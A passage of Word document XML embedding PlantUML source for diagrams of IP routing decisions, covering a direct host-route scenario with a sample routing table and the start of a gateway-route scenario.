          <w:p w14:paraId="46CCA166" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>title Routing Decision – Host Route Direct</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3358AAE9" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6BA172DA" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BBFF69B" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Packet arrives with destination IP (172.16.5.10);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E6450E0" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="697FA6E5" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Extract destination IP from packet header;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61329367" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C4DCC0E" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Search routing table for matching entries;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F9A15AA" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="553E2034" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B665810" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>Sample Routing Table:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="304D2A3E" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>Destination     Gateway           Genmask              Flags    Metric    Ref    Use     Iface</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B5A4A7E" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>0.0.0.0            192.168.1.254     0.0.0.0                   UG       100      0       152     eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71E87F90" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>172.16.5.10    0.0.0.0                 255.255.255.255   UGH     50        0       10       eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F72B590" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>172.16.0.0      192.168.1.254     255.255.0.0           U          75        0       5         eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EAC580F" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>192.168.1.0    0.0.0.0                 255.255.255.0       U             0       0       200     eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64BB364D" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D1F15BD" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C91F7D6" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>if (Exact host match found?) then (yes\n172.16.5.10)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76DD901A" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  if (Uses gateway?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CEE1A9A" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    #LightGray :Forward to next hop;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="457F41D0" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  else (no\n0.0.0.0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E0CA76C" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    #LightSkyBlue :Send directly to destination host;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="067FB26E" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BECD16B" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="772ADD32" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightGray :Check network match;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4274B396" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="121A550A" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="173D286B" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>stop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="204444CC" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76101B3A" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>legend right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62F16718" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightSkyBlue = taken path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="620CFAA1" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightGray    = not taken</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26F7D672" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>endlegend</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CEA92BB" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E0CA9" w14:paraId="4DD71724" w14:textId="77777777" w:rsidTr="00DF4B7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4720249D" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00210D9C" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00210D9C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scenario 2 – Network Route via Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37297E17" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E0CA9" w14:paraId="52F28CBD" w14:textId="77777777" w:rsidTr="00DF4B7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F9F914D" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79DFC18C" wp14:editId="181100FD">
                  <wp:extent cx="7052436" cy="4776653"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="414266545"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7513" cy="4793638"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37960CEB" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="127A53F6" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>skinparam monochrome false</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79F3CDDE" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>skinparam activity {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="192DC51F" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  BackgroundColor white</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BEFF953" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  BorderColor black</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="103CAE6F" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  FontColor black</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02FCA488" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31409E78" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="170C29C1" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>title Routing Decision – Network Route via Gateway</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48AA9885" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53AA0420" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C6D2959" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Packet arrives with destination IP (172.16.8.25);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42D8207C" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78631720" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Extract destination IP from packet header;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C7B1DEA" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A375413" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Search routing table for matching entries;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67A15456" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="332D559D" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D3A30DD" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>Sample Routing Table:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C717D67" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>Destination     Gateway         Genmask            Flags Metric Ref Use    Iface</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E4C0A4" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
